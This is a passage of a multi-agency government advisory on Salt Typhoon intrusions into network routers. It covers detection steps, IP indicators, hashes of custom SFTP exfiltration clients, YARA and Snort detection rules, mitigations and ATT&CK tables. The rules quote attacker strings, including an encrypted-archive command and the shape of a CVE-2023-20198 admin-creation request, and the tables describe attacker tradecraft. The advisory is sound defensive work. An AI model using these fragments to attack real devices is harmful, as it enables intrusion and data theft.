  • Perform hash verification on firmware and compare values against the vendor's database to detect unauthorized modification to the firmware. Ensure that the firmware version is as expected.
  • Compare hashes of images both on disk and in memory against known-good values. Reference the Network Device Integrity (NDI) Methodology or Network Device Integrity (NDI) on Cisco IOS Devices for more information.
  • Use the product’s run-time memory validation or integrity verification tool to identify any changes to the run-time firmware image.
  • Where supported by the platform, enable image and configuration integrity features, such as signed image enforcement and secure configuration checkpoints. Alert on any boot-time or run-time verification failure.
  • Check any available file directories that may exist (flash, non-volatile random-access memory [NVRAM], system, etc.) for non-standard files.

Monitor logs

  • Review logs forwarded from network devices for indications of potential malicious behavior, such as:
    • Evidence of clearing locally stored logs,
    • Disabling log creation or log forwarding,
    • Starting a PCAP recording process using available functions,
    • Allowing remote access via non-standard methods or to new locations, and
    • Changes to configuration of devices via non-standard methods or from unexpected locations.
  • Alert on creation/start of any on-box packet capture (e.g., monitor capture ... start, Embedded Packet Capture) or SPAN/RSPAN/ERSPAN session definitions, especially those matching TACACS+ (TCP/49) or RADIUS.
  • Inventory and continuously watch monitor session ... (SPAN/ERSPAN) and PCAP state. Naming patterns include mycap and output filenames like mycap.pcap, tac.pcap, and 1.pcap.
  • Where supported, deploy embedded event triggers (e.g., EEM on IOS XE/NX-OS) to syslog any invocation of packet-capture or span/erspan configuration commands, capturing the invoking username and source.
  • Audit for non-root local accounts granted sudo on XR host Linux (e.g., via /etc/sudoers or /etc/sudoers.d/). Where supported, ensure the host operating system (OS) sshd_operns service is disabled and not listening. Validate at each reboot and device upgrade.
  • Alert on config or telemetry indicating new XR host OS services, changes to systemd service states, or unexpected privilege escalations on the host OS.
  • Analyze internal FTP Server logs for any logins from unexpected sources.
  • Monitor network traffic for logons from one router to another router, as this should not be typical of normal router administration processes.

If unauthorized activities are discovered, coordinate containment sequencing before disabling to avoid tipping active APT operators. Capture live artifacts (process lists, bound sockets, on-box files), then eradicate.

See the Contact information section of this advisory for response actions that should be taken if malicious activity is confirmed.

Indicators of compromise

IP-based indicators

The following IP indicators were associated with the APT actors’ activity from August 2021 to June 2025. Disclaimer: Several of these observed IP addresses were first observed as early as August 2021 and may no longer be in use by the APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Table 3: APT-associated IP-based Indicators, August 2021-June 2025
1.222.84[.]29  167.88.173[.]252 23.227.202[.]253 45.61.151[.]12
103.169.91[.]231 167.88.173[.]58 37.120.239[.]52 45.61.154[.]130
103.199.17[.]238 167.88.175[.]175 38.71.99[.]145 45.61.159[.]25
103.253.40[.]199 167.88.175[.]231 43.254.132[.]118 45.61.165[.]157
103.7.58[.]162 172.86.101[.]123 45.125.64[.]195 5.181.132[.]95
104.194.129[.]137 172.86.102[.]83 45.125.67[.]144 59.148.233[.]250
104.194.147[.]15 172.86.106[.]15 45.125.67[.]226 61.19.148[.]66
104.194.150[.]26 172.86.106[.]234 45.146.120[.]210 63.141.234[.]109
104.194.153[.]181 172.86.106[.]39 45.146.120[.]213 63.245.1[.]34 
104.194.154[.]150 172.86.108[.]11 45.59.118[.]136 74.48.78[.]66  
104.194.154[.]222 172.86.124[.]235 45.59.120[.]171 74.48.78[.]116  
107.189.15[.]206 172.86.65[.]145 45.61.128[.]29 74.48.84[.]119  
14.143.247[.]202 172.86.70[.]73 45.61.132[.]125 85.195.89[.]94
142.171.227[.]16 172.86.80[.]15 45.61.133[.]157 89.117.1[.]147
144.172.76[.]213 190.131.194[.]90 45.61.133[.]31 89.117.2[.]39
144.172.79[.]4 193.239.86[.]132 45.61.133[.]61 89.41.26[.]142
146.70.24[.]144 193.239.86[.]146 45.61.133[.]77 91.231.186[.]227
146.70.79[.]68 193.43.104[.]185 45.61.133[.]79 91.245.253[.]99
146.70.79[.]81 193.56.255[.]210 45.61.134[.]134 2001:41d0:700:65dc::f656[:]929f
167.88.164[.]166 212.236.17[.]237 45.61.134[.]223 2a10:1fc0:7::f19c[:]39b3
167.88.172[.]70 23.227.196[.]22 45.61.149[.]200
167.88.173[.]158 23.227.199[.]77 45.61.149[.]62


 Custom SFTP client

The APT actors also use a custom SFTP client, which is a Linux binary written in Golang, to transfer encrypted archives from one location to another. 

The following SFTP client binaries in Table 4 through Table 7 are similar in that they are used to transfer files from a compromised network to staging hosts where the files are prepared for exfiltration. However, cmd1 has the additional capability of collecting network packet captures on the compromised network. Note: The cmd3 and cmd1 clients were likely written by the same developer since they have similar build path strings and code structure.

Table 4: cmd3 SFTP client 
File Name  cmd3 
MD5 Hash  eba9ae70d1b22de67b0eba160a6762d8 
SHA 256 Hash 8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1
File Size (bytes)  3506176 
File Type  ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=rHFK_GWSIG3fShYR02ys/Hou3WF-dO9MYtI232CYr/
D3n2Irn5doNndtloYkEi/r3IcebaH3y02cYer7tm0 stripped 
Command Line Usage  ./cmd3 <encrypted_configuration_string> 
Version String  v1.0 
Build Path String  C:/work/sync/cmd/cmd3/main.go 
Table 5: cmd1 SFTP client
File Name  cmd1 
MD5 Hash  33e692f435d6cf3c637ba54836c63373 
SHA 256 Hash f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4
File Size (bytes)  3358720 
File Type  ELF 64-bit LSB executable x86-64 version 1 (SYSV) statically linked Go BuildID=N3lepXdViXHdPCh5amSa/LhM5susdTarcmIQEMqku/
eplvxiWNUFNeKXjT-6sd/R-eCtbFZFNozRZqEuwZY stripped 
Command Line Usage  ./cmd1 <encrypted_configuration_string> 
Version String  V20240816 
Build Path String  C:/work/sync_v1/cmd/cmd1/main.go 

Cmd1 SFTP client Yara rule 

rule SALT_TYPHOON_CMD1_SFTP_CLIENT {

    meta:

    description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."

 

    strings:

        $s1 = "monitor capture CAP"

        $s2 = "export ftp://%s:%s@%s%s"

        $s3 = "main.CapExport"

        $s4 = "main.SftpDownload"

        $s5 = ".(*SSHClient).CommandShell"

        $aes = "aes.decryptBlockGo"

        $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"

 

    condition:

        (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and 
        uint32(uint32(0x3C)) == 0x00004550) or ((uint32(0) == 0xcafebabe)
        or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) 
        or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) 
        or (uint32(0) == 0xcffaedfe))) 
        and 5 of them

}

Table 6: new2 SFTP client
File Name  new2
SHA 256 Hash da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e
File Type  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped

New2 SFTP client Yara rule 

rule SALT_TYPHOON_NEW2_SFTP_CLIENT {

    meta:

        description = "Detects the Salt Typhoon New2 SFTP client. Rule is meant for threat hunting."

 

    strings:

        $set_1_1 = "invoke_shell"

        $set_1_2 = "execute_commands"

        $set_1_3 = "cmd_file"

        $set_1_4 = "stop_event"

        $set_1_5 = "decrypt_message"

        $set_2_1 = "COMMANDS_FILE"

        $set_2_2 = "RUN_TIME"

        $set_2_3 = "LOG_FILE"

        $set_2_4 = "ENCRYPTION_PASSWORD"

        $set_2_5 = "FIREWALL_ADDRESS"

        $set_3_1 = "commands.log"

        $set_3_2 = "Executing command: {}"

        $set_3_3 = "Connecting to: {}"

        $set_3_4 = "Network sniffer script."

        $set_3_5 = "tar -czvf - {0} | openssl des3 -salt -k password -out {0}.tar.gz"

        $set_required = { 00 70 61 72 61 6D 69 6B 6F }

 

    condition:

        $set_required and 4 of ($set_1_*) and 4 of ($set_2_*) 
        and 4 of ($set_3_*)

}

Table 7: sft SFTP client
File Name  sft
SHA 256 Hash a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe
File Type  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=Q_mmdNzBVit4XSJyGrtd/ampmN-03i9bT1qzD9njH/MFeCrtuGl37O7UNKFQyk/sBN-cduKnfSAvXO7jzGG, with debug_info, not stripped

CVE 2023-20198 Snort rule

alert tcp any any -> any $HTTP_PORTS (msg:"Potential CVE-2023-20198 exploit attempt - HTTP Request to Add Privilege 15 User Detected"; content:"POST"; http_method; pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri; content:"<request xmlns=\"urn:cisco:wsma-config\" correlator=\"execl\">"; http_client_body; content:"<configApply details=\"all\">"; http_client_body; content:"<config-data>"; http_client_body; content:"<cli-config-data-block>"; http_client_body; content:"username"; http_client_body; content:"privilege 15"; http_client_body; content:"secret"; http_client_body; sid:1000003; rev:1;)

Mitigations

These APT actors are having considerable success using publicly known CVEs to gain access to networks, so organizations are strongly encouraged to prioritize patching in a way that is proportionate to this threat, such as by sequencing patches to address the highest risks first. See CISA’s Known Exploited Vulnerabilities Catalog for further information. Specifically, organizations should ensure edge devices are not vulnerable to known exploited CVEs identified in this advisory.

Note: This advisory uses MITRE D3FEND™, version 1.2.0, cybersecurity countermeasures. See the Appendix C: MITRE D3FEND Countermeasures section of this advisory for a table of the mitigations mapped to MITRE D3FEND countermeasures.

General recommendations

  • Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for the activities listed in this advisory [D3-PM]. In particular, check for:
    • Unexpected GRE or other tunneling protocols, especially with foreign infrastructure [D3-NTCD].
    • Unexpected external IPs set as a TACACS+ or RADIUS server, or other AAA service configuration modifications.
    • Unexpected external IPs in ACLs.
    • Unexpected packet capture or network traffic mirroring settings.
    • Unexpected virtual containers running on network devices, or, where virtual containers are expected, unexpected commands within the containers.
  • Employ a robust change management process that includes periodic auditing of device configurations [D3-PM].
    • Ensure all networking configurations are stored, tracked, and regularly audited via a change management process. A change management process audits approved configurations against what is currently running in an organization’s infrastructure.
    • Review firewall rule creation and modification dates, cross referencing against change management approvals, to detect unauthorized rules or rule changes.
    • Create alarms or alerts for unusual router administration access, commands, or other activity.
  • Attempt to identify the full scope of a suspected compromise before mitigating. While it is important to contain the intrusion and prevent further malicious activity, if the full scope is not identified and mitigated fully, the actors may retain access and cause further malicious activity. Threat hunting and incident response efforts should be balanced against the total potential malicious activity with the goals of full eviction and minimizing damage.
    • An established compromise by these APT actors will likely include recurring, large-scale exfiltration from the compromised network. In at least one instance, the APT actors utilized GRE and MPLS tunnels to move data back to China.
  • Disable outbound connections from management interfaces to limit possible lateral movement activity between network devices [D3-OTF].
  • Disable all unused ports and protocols (both traffic and management protocols) [D3-ACH]. Only use encrypted and authenticated management protocols (e.g., SSH, SFTP/SCP, HTTPS) and disable all others, especially unencrypted protocols (e.g., Telnet, FTP, HTTP).
  • Change all default administrative credentials, especially for network appliances and other network devices [D3-CFP].
  • Require public-key authentication for administrative roles. Disable password authentication where operationally feasible. Minimize authentication attempts and lockout windows to slow brute force and sprayed attempts [D3-CH].
  • Use the vendor recommended version of the network device operating system and keep it updated with all patches. Upgrade unsupported network devices to ones that are supported by the vendor with security updates [D3-SU].

Hardening management protocols and services

  • Implement management-plane isolation and control-plane policing (CoPP) [D3-NI].
    • Place all device management services (SSH, HTTPS, SNMP, TACACS+/RADIUS, SCP/SFTP) strictly in a dedicated out-of-band management network or a management VRF.
    • Ensure this management VRF has no route leakage to customers or peering VRFs and cannot initiate or receive sessions from data-plane or peering address space [D3-ITF].
    • Block all egress from the management VRF except to explicitly authorized AAA/syslog/NetFlow/IPFIX/telemetry collectors to prevent actor use of management interfaces as lateral movement conduits or exfiltration paths.
    • Apply explicit management-plane ACLs at the control plane (e.g., CoPP/CPPr) to allowlist (i.e., default-deny) and rate-limit management protocols. Allow only approved management station IPs/subnets and jump servers.
      • Apply these restrictions to all SNMP, TACACS+/RADIUS (TCP/UDP 49/1812/1813), HTTPS (TCP/443 and any configured non-default port), SSH (TCP/22 and any configured non-default port), and SFTP/SCP.
      • For devices that do not support ACLs, place on a separate management Virtual Local Area Network (VLAN); an ACL can be applied to this management VLAN from an upstream device, such as a router or Layer 3 switch.
  • Use SSHv2 only and disable Telnet. Audit and restrict SSH on non-default ports (e.g., 22x22 and xxx22 patterns) commonly used by the APT actors.
  • If a web interface is operationally required, bind it only to the management VRF/interface. Use HTTPS only and disable unencrypted HTTP. Require AAA for web interface access. Monitor and alert on non-default high HTTPS ports (e.g., 18xxx) observed in intrusions.
  • Use SNMPv3 only, and disable SNMPv1 and SNMPv2. Configure Trusted Managers and ACLs to limit SNMP access to only trusted devices.
    • Change all weak and default SNMP community strings.
    • Restrict and monitor SNMP writes.
    • Enforce SNMPv3 with authPriv and apply VACM views that exclude configuration-altering MIB objects from write access. Only grant read access for required OIDs; reserve write access for tightly scoped automation accounts from approved managers.
  • Continuously monitor SNMP SET operations and alert on changes to AAA servers, HTTP/HTTPS enablement or port changes, tunnel interfaces, SPAN/ERSPAN sessions, and routing and ACL objects. Actor tradecraft includes issuing SNMP SETs to make covert configuration changes at scale.
  • Configure only strong cryptographic cipher suites for all management protocols (e.g., SSH, SFTP, HTTPS) and reject all weak ones.
  • Enforce per-protocol rate limits (particularly for SSH, HTTPS, SNMP, TACACS+/RADIUS) to blunt credential-guessing and slow “low-and-slow" abuse of built-in functions (e.g., Embedded Packet Capture, tunnel setup) without denying legitimate admin access.
  • Eliminate unintended IPv6 management exposure.
    • If IPv6 is enabled, apply equivalent controls for IPv6 as for IPv4.
    • Enforce management-plane ACLs and CoPP for IPv6. Bind management services only to the management VRF/interface in IPv6.
    • Audit for IPv6-reachable management services and tunnels, as the APT actors’ infrastructure includes IPv6 addresses. 

Implementing robust logging

  • Ensure logging is enabled and forwarded to a centralized server. Set the trap and buffer logging levels on each device to at least syslog level “informational” (code 6) to collect all necessary information.
  • Ensure all logs sent to a centralized logging server are transmitted via a secure, authenticated, and encrypted channel (such as IPsec, TLS, or SSH tunnels). The central server should maintain immutable logs with retention periods sufficient to support cybersecurity incident response investigations and comply with applicable retention policies.
  • Enable AAA command accounting for privileged commands to record any attempts to invoke those commands.

Routing best practices

  • Utilize routing authentication mechanisms, when possible.
  • Protect peering and edge routing paths often abused for covert redirection.
    • Continuously validate static routes, policy-based routing (PBR), and VRF-leak policies at peering edges. Alert on additions that steer traffic toward non-standard GRE/IPsec endpoints or unexpected next hops.
  • Enforce maximum-prefix limits, strict prefix/AS-path filtering, and “only-expected” communities on all external BGP (eBGP) sessions. Deny default and overly broad routes.
  • Enable TTL security (GTSM) or equivalent for eBGP to reduce off-path attack surface.
  • Require session protection (TCP-AO where supported, otherwise MD5) and monitor for BGP session resets and parameter changes from unexpected management origins.

Virtual Private Network (VPN) best practices

  • Delete default VPN Internet Key Exchange (IKE) policies and associated components.
  • Create IKE policies consistent with applicable requirements and guidance on cryptographic algorithm use. For U.S. National Security Systems, follow Committee on National Security Systems Policy (CNSSP) 15 and other applicable policies:
    • Diffie-Hellman Group: 16 with 4096 bit Modular Exponential (MODP)
    • Diffie-Hellman Group: 20 with 384 bit Elliptic Curve Group (ECP)
    • Encryption: AES-256
    • Hashing: SHA-384 

Cisco-specific recommendations

  • Disable the Cisco Smart Install feature.
  • Store credentials using strong cryptography.
    • Protect local credentials on Cisco networking devices using Type 8 (PBKDF2-SHA-256) where supported. Do not use Type 7 and transition from Type 5 (MD5) when possible.
    • Use Type 6 (AES) key encryption to protect stored secrets (e.g., TACACS+/RADIUS shared secrets or IKE PSKs).
  • Disable outbound connections from the VTYs (e.g., transport output none). This prevents initiating SSH, Telnet, or other client sessions from the device via VTY, reducing its utility as a jump host. Monitor for any changes to this setting.
  • Audit for unexpected enablement of IOS XR host SSH (sshd_operns) on TCP/57722. This is disabled by default, but has been observed being enabled by actors for persistence.
  • When not required, disable the web configuration interface on applicable Cisco networking devices by running no ip http server and no ip http secure-server.
    • If management via a web interface is required, ensure to enable only the HTTPS management interface by running the command ip http secure-server and keep no ip http server configured to prevent unencrypted access via HTTP.
  • Ensure a final deny any any log line is added to all configured ACLs. This ensures that the denied connections are logged so they could be reviewed at a later date.

Mitigating Guest Shell abuse

  • Disable Guest Shell where not operationally required.
    • For IOS XE, run guestshell disable to stop the container. Where supported, disable the IOx subsystem with no iox to prevent container hosting entirely. Confirm with show guestshell / show iox.
    • For NX-OS, run guestshell disable to stop the container. Use guestshell destroy to uninstall it and return resources to the system. Confirm with show guestshell.
  • Where Guest Shell is disabled, restrict (re)enabling Guest Shell.
    • Enforce AAA command authorization (TACACS+/RADIUS) so only approved roles can run guestshell enable, guestshell run bash (IOS XE), run guestshell (NX-OS), guestshell disable/destroy, chvrf, dohost, or IOx-related commands.
  • Where Guest Shell is used:
    • Forward container logs (e.g., journald/systemd inside Guest Shell) to your SIEM. Device syslog does not capture process activity inside the container by default.
    • Configure the VRF used by Guest Shell (management VRF on IOS XE; default VRF on NX-OS unless chvrf is used). Restrict egress to only required destinations (e.g., SIEM/AAA/telemetry collectors) with ACLs.
    • Perform periodic inventories and integrity checks of device storage (e.g., bootflash:) to detect unexpected files created from the container.
    • Create alerts for guestshell disable / guestshell destroy and unexpected chvrf / dohost usage. Consider Cisco Embedded Event Manager (EEM) policies that snapshot state (running processes, container filesystem, storage listings) when these events occur.

Additional Cisco resources:

Resources

Additional information can be found in the following publicly available guidance.

United States resources

United Kingdom resources

International resources

Acknowledgements

The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Cisco Security & Trust, Cisco Talos, Crowdstrike, Google Mandiant, Google Threat Intelligence, Greynoise, Microsoft, PwC Threat Intelligence, and additional industry partners for their contribution to this advisory.

Version History

27 August 2025, v1.0: Initial publication

3 September 2025, v1.1: Japan NCO name correction, added introduction in Technical details, update in Initial access to clarify example CVEs’ ordering, one IP correction and two removals. 

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact information

The following contacts are non-exhaustive, and organizations should follow all applicable reporting requirements for a given incident or other event.

United States organizations

  • National Security Agency (NSA)
  • Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)
    • U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center (contact@mail.cisa.dhs.gov, 888-282-0870, or reporting online at cisa.gov/report), or your local FBI field office.
    • Methods for initial access are a critical information gap for parties working to understand the scope, scale, and impact of these APT actors. When available, please include the following information regarding the incident:
      • Type of activity and types of equipment affected by or used in the activity;
      • APT actors’ tactics, techniques, and procedures (TTPs) used to conduct initial access and/or lateral movement;
      • Exfiltration infrastructure and associated techniques (Layer 2/Layer 3);
      • Passwords and associated techniques used to encrypt exfiltrated data;
      • Likely or confirmed compromised routing equipment connected to or used by government networks;
      • Insights into how the compromised devices are tasked (i.e., how is traffic of interest selected for collection/redirection);
      • Signs of compromise or persistence beyond the specific network devices themselves (e.g., additional targets, such as network operations staff, IT/corporate email, etc.).
      • Date, time, and location of the incident;
      • Number of people affected;
      • Name of the submitting company or organization; and
      • Designated point of contact.
  • Department of Defense Cyber Crime Center (DC3)

Australian organizations

  • Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

Canadian organizations

New Zealand organizations

United Kingdom organizations

  • UK National Cyber Security Centre (NCSC)
    • The NCSC—a part of intelligence, security, and cyber agency GCHQ—is the UK’s technical authority on cyber security. UK organizations should report significant cyber security incidents via https://report.ncsc.gov.uk/ (monitored 24/7).
  • Ofcom
    • Ofcom is the UK’s communications regulator and is responsible for enforcing the telecoms security provisions in the Communications Act (2003) and the Telecommunications Security Act (2021). Guidance and contact information on standards, specifications, and other requirements for the UK telecoms industry can be found at https://www.ofcom.org.uk.
    • For general inquiries: networksecurityenquiries@ofcom.org.uk
    • For incident reports: incident@ofcom.org.uk 

Czech Republic organizations

Finnish organizations

Germany organizations

Italian organizations 

Japanese organizations

Polish organizations

Appendix A: MITRE ATT&CK tactics and techniques

See Table 8 through Table 20 for all the threat actor tactics and techniques referenced in this advisory.

Table 8: Reconnaissance
Technique Title ID Use
Active Scanning T1595 Actively scan for open ports and services
Gather Victim Network Information: Network Topology T1590.004 Leverage configuration files from exploited devices to gather the network topology information
Table 9: Resource Development
Technique Title ID Use
Acquire Infrastructure: Virtual Private Servers T1583.003 Leverage VPS as infrastructure
Compromise Infrastructure: Network Devices T1584.008 Compromise intermediate routers
Obtain Capabilities: Exploits T1588.005 Utilize publicly available code (siet.py) to exploit vulnerable devices 
Obtain Capabilities: Tool T1588.002 Utilize publicly available tooling (e.g., map.tcl, tclproxy.tcl, wodSSHServer) 
Table 10: Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 Exploit publicly known CVEs 
Trusted Relationship T1199 Leverage trusted connections between providers to pivot between networks
Table 11: Execution
Technique Title ID Use
System Services T1569 Executing commands via SNMP
Container Administration Command T1609 Use Guest Shell to load open-source tools and as a jump point for reconnaissance and follow-on actions in the environment
Command and Scripting Interpreter: Python T1059.006 Use Python script siet.py 
Command and Scripting Interpreter: Network Device CLI T1059.008 Use built-in CLI on network devices to execute native commands
Table 12: Persistence
Technique Title ID Use
Create Account: Local Account T1136.001 Create new local users on network devices for persistence
Container Service T1543.005 Leverage Linux-based Guest Shell containers, natively supported in a variety of Cisco OS software
Account Manipulation: SSH Authorized Keys T1098.004 Regain entry into environments via SSH into network devices
Table 13: Privilege Escalation
Technique Title ID Use
Exploitation for Privilege Escalation T1068 Exploit CVE-2023-20273 to gain root-level user privileges
Brute Force: Password Cracking T1110.002 Brute force passwords with weak encryption in obtained configuration files
Table 14: Defense Evasion
Technique Title ID Use
Obfuscated Files or Information: Command Obfuscation T1027.010 Obfuscate paths with “double encoding”
Obfuscated Files or Information T1027 Obfuscate source IP addresses in system logs, as actions may be recorded as originating from local IP addresses 
Impair Defenses: Disable or Modify System Firewall T1562.004 Modify ACLs, adding IP addresses to bypass security policies and permit traffic from a threat actor-controlled IP address
Deploy Container T1610 Deploy virtual container (e.g., Guest Shell) on network infrastructure to persist and evade monitoring services
Indicator Removal T1070 Delete and/or clear logs
Indicator Removal: Clear Persistence T1070.009 Use Guest Shell destroy command to deactivate and uninstall Guest Shell container and return all resources to the system
Network Boundary Bridging T1599 Abuse peering connections 

 

Table 15: Credential Access
Technique Title ID Use
Network Sniffing T1040 Passively collect packet capture (PCAP) from networks for configurations and credentials
Modify Authentication Process T1556 Modify a router’s TACACS+ server configuration to point to an APT actor-controlled IP address to capture authentication attempts or modify AAA configurations to use less secure authentication methods
OS Credential Dumping T1003 Collect router configuration with weak Cisco Type 7 passwords
Brute Force: Password Cracking T1110.002 Brute force weak hashed Cisco Type 5 password
Table 16: Discovery
Technique Title ID Use
System Information Discovery T1082 Leverage CLI on network devices to gather system information
System Network Configuration Discovery T1016 Enumerate interfaces/VRFs/routing/ACLs and related network settings from the device CLI/SNMP
Table 17: Lateral Movement
Technique Title ID Use
Remote Services T1021 Enumerate and alter the SNMP configurations for other devices in the same community group
Remote Services: SSH T1021.004 Enable SSH servers and open external-facing ports on network devices to maintain encrypted remote access
Table 18: Collection
Technique Title ID Use
Archive Collected Data T1560 Compile configurations and packet captures
Data from Configuration Repository: SNMP (MIB Dump) T1602.001 Target MIB to collect network information via SNMP
Data from Configuration Repository: Network Device Configuration Dump T1602.002 Acquire credentials by collecting network device configurations
Data from Local System T1005 Passively collect PCAP from specific ISP customer networks
Table 19: Command and Control
Technique Title ID Use
Proxy T1090 Use VPS for C2
Proxy: Multi-hop Proxy T1090.003 Leverage open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control and operator access
Application Layer Protocol T1071 Open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS)
Non-Standard Port T1571 Utilize non-standard ports to evade detection by security monitoring tools that focus on standard port activity
Protocol Tunneling T1572 Create tunnels over protocols such as GRE, mGRE, or IPsec on network devices
Non-Application Layer Protocol T1095 Use GRE/IPsec to carry C2 over non-application layer protocols
Table 20: Exfiltration
Technique Title ID Use
Exfiltration over Alternative Protocol T1048.003 Use tunnels, such as IPsec and GRE, to conduct C2 and exfiltration activities

Appendix B: CVEs exploited

Table 21: Exploited CVE information
CVE  Vendor/Product  Details
CVE-2024-21887 Ivanti Connect Secure and Ivanti Policy Command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass)
CVE-2024-3400 Palo Alto Networks PAN-OS GlobalProtect Arbitrary file creation leading to OS command injection, allowing for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations
CVE-2023-20273 Cisco IOS XE Web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root)
CVE-2023-20198 Cisco IOS XE Authentication bypass vulnerability to create unauthorized administrative accounts
CVE-2018-0171 Cisco IOS and IOS XE Smart Install remote code execution vulnerability

 

Appendix C: MITRE D3FEND Countermeasures

Table 22: MITRE D3FEND countermeasures
Countermeasure Title  ID  Details 

Platform Monitoring 

Regularly review network device (especially router) logs and configurations for evidence of any unexpected, unapproved, or unusual activity, especially for changes to network tunnels, AAA configurations, ACLs, packet captures or network mirroring, and virtual containers
Network Traffic Community Deviation D3-NTCD Check for unexpected GRE or other tunneling protocols, unexpected TACACS+ or RADIUS servers, or other unusual traffic

Outbound Traffic Filtering 

D3-OTF 

Disable outbound connections from management interfaces

Application Configuration Hardening 

Disable all unused ports and protocols (both traffic and management protocols), disable Cisco smart install, disable Cisco Guest Shell, use only strong cryptographic algorithms
Change Default Password D3-CFP Change all default administrative credentials and SNMP community strings

Credential Hardening 

D3-CH 

Disable password authentication where possible, use strong PKI-based or multifactor authentication, use strong cryptographic password storage settings (i.e., Cisco Type 8), and use lockouts to slow brute force attempts

Software Update 

D3-SU 

Update software to patch known vulnerabilities and upgrade devices to supported versions

Network Isolation 

D3-NI 

Implement management-plane isolation and control-plane policing (CoPP) to keep all network management traffic separate from data plane traffic

Inbound Traffic Filtering 

D3-ITF 

Ensure management VRFs cannot receive traffic from the data plane
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